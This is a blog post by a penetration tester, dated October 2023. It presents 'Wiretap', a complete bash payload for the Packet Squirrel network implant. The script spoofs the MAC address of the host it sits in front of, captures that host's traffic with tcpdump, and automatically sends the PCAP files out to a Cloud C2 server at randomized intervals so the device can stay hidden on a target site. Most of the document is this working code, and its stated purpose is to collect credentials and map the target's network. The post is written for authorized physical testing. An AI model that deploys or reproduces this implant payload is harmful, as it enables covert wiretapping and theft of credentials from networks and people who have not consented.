Automated Long Haul Packet Squirrel PCAP Exfiltration

Fire and forget script for the Packet Squirrel to exfiltrate PCAPs to Cloud C2

The Packet Squirrel is a great network implant that can be used for a variety of purposes. One of the most common uses is to sniff network traffic to pcap. This is a great way to gather credentials, identify hosts, domain controllers, protocols in use and perform lots of other network reconnaissance and packet analysis. However the default tcpdump payload requires manual retrieval of the implanted Packet Squirrel from the target site to recover the pcaps.

This is obviously not ideal during a physical penetration test as you must re enter the site to recover the device which makes it rather useless as a long haul implant. To solve this problem I wrote a payload that will automatically exfiltrate a set number of pcap files to Cloud C2 at a given interval. The pcaps are archived, compressed, saved to USB and rotated after each round of exfiltration. This allows the Packet Squirrel to be deployed and left on site for long periods of time without the need to re enter the site to recover the device.

All you need to do is set the sleep interval and number of pcaps to exfiltrate, modify the default jitter values if you prefer something shorter, copy the payload to the switch1 folder and the device will do the rest. The NETMODE has also been set to CLONE which clones the MAC address of the MITM’d host from the ethernet in (eth0) port and spoofs it on the ethernet out (eth1) port.


Pseudo Code Flow Diagram


payload.sh

#!/bin/bash
#
# Title:        Wiretap
# Description:  Sets the NETMODE to CLONE for opsec, sniffs traffic, 
#               and exfiltrates a set number of PCAPs to Cloud C2 at a given interval.
#               PCAPs are archived and rotated after each round of exfiltration.
# Author:       Shain Lakin
# Version:      1.0
# Category:     sniffing, exfiltration
# Target:       Any
# Net Mode:     CLONE
# LED loop:     LEDs are off by default, uncomment for debugging
#               Solid Yellow; tcpdump running
#               Flashing Magenta; exfiltrating pcap
#               Flashing Red; killing tcpdump
#               White Solid; archiving pcaps and sleeping


interval=3600
num_exfils=100
mode=CLONE
jitter=$((30 + RANDOM % 600))


function rotate() {
	#LED W SOLID
	mkdir -p /mnt/loot/archive &>/dev/null
	tar -czf /mnt/loot/archive/archive-$fname.tar.gz \
	/mnt/loot/tcpdump/ &>/dev/null
	rm /mnt/loot/tcpdump/dump*
	sleep $(($interval + $jitter))
}


function finish() {
	#LED R FAST
	kill $1
	wait $1
	sync
	sleep 1
}


function sniff() {
	
	fname=dump_$(date +%Y-%m-%d-%H-%M).pcap
	mkdir -p /mnt/loot/tcpdump &>/dev/null
	tcpdump -i eth0 -w /mnt/loot/tcpdump/$fname -C 2 -z sync &>/dev/null &
	tpid=$!
	sleep 5
	
	c=0 
 
	while true
	do
		#LED ATTACK
		LED OFF
		
		if [[ $c -eq 0 ]]
		then
			while [[ $(ls -al /mnt/loot/tcpdump/$fname \
			| awk '{print $5}') -lt 2000000 ]]; do sleep 1;done
		else	
			while [[ $(ls -al /mnt/loot/tcpdump/$fname$c \
			| awk '{print $5}') -lt 2000000 ]]; do sleep 1;done
		fi

		if [[ $c -eq 0 ]]
		then
			sync
			sleep $((10 + RANDOM % 30))
			#LED M SUCCESS
			C2EXFIL /mnt/loot/tcpdump/$fname
		else
			sync
			sleep $((5 + RANDOM % 10))
			#LED M SUCCESS
			C2EXFIL /mnt/loot/tcpdump/$fname$c
		fi
		
		((c++))
		
		if [[ $c -eq $num_exfils ]]
		then
			finish $tpid
			rotate $fname
			sniff
		else
			continue
		fi
	done
}


[[ ! -f /mnt/NO_MOUNT ]] && {
	NETMODE $mode
	sleep 30
	C2CONNECT
	sniff
} || {
	LED FAIL
}
******
Written by Shain Lakin on 09 October 2023